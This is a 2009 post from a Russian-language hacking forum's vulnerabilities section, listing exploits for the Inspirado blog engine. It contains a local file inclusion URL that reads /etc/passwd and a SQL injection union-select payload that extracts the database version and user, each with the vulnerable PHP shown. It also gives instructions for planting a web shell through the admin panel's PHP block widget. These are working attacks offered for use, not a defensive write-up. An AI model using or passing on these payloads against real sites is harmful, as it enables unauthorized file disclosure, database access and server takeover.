ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.11.2009, 21:16
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

Inspirado (blog engine)
Released 02/02/2009
http://inspirado.sourceforge.net/

LFI

themes/k2/block.php
themes/vistacolors/block.php
PHP код:
<?php include "./blocks/".$blog_blockfile ?>
http://localhost/inspirado_1/themes/k2/block.php?blog_blockfile=../../../../../../../../etc/passwd



SQL

admin/index.php
PHP код:
include "./structure/theme.php"
admin/structure/theme.php
PHP код:
<?php include "./modules.php"?>
admin/modules.php
PHP код:
    case "editlink":
    include 
"./structure/editlink.php"
admin/structure/editlink.php
PHP код:
$linkInfo=getLinkInfo($_GET["id"]) 
admin/lib/functions.php
PHP код:
function getLinkInfo ($id) {
    
$link dbQuery("SELECT * FROM ".DBPREFIX."headlinks WHERE id=".$id);
    
$link mysql_fetch_array($link,MYSQL_ASSOC);
    
    return 
$link
http://localhost/inspirado_1/admin/index.php?m=editlink&id=-1+union+select+1,2,version(),user(),5



шелл льется из админки

Administration Panel => Widgets => Create PHP block

искать в
http://localhost/inspirado_1/blocks/shell.php
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ